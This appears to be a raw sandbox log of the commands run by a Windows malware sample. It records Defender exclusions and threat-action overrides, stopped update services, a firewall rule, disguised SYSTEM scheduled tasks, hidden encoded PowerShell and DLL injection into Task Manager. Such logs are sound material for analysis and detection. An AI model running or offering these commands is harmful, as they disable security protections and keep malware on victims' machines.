"C:\Windows\system32\gpupdate.exe" /force

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

\??\c:\windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 68 -s 580

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gZKLshbed"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 04:55:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\fydFwya.exe\" 3Y /Tzsite_idQqV 385119 /S" /V1 /F

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\fydFwya.exe

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\fydFwya.exe 3Y /Tzsite_idQqV 385119 /S

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DlbZONUGhjVU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DlbZONUGhjVU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GpfcWYRxKqUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GpfcWYRxKqUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KrPQunXfXpAVC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KrPQunXfXpAVC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oVhJPNkDU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oVhJPNkDU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nBRnpywzcTvqknVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nBRnpywzcTvqknVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nBRnpywzcTvqknVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nBRnpywzcTvqknVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wUBDPVxDQVpvNZiy /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wUBDPVxDQVpvNZiy /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gbzFHAGqR" /SC once /ST 03:22:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gbzFHAGqR"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc

\??\c:\windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gbzFHAGqR"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "GyWbuVQzPmDmgkCMH" /SC once /ST 00:20:24 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe\" KS /tcsite_idDGS 385119 /S" /V1 /F

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "GyWbuVQzPmDmgkCMH"

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe

C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe KS /tcsite_idDGS 385119 /S

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bwpFiyeZPJPVdaMxTt"

C:\Windows\SysWOW64\cmd.exe

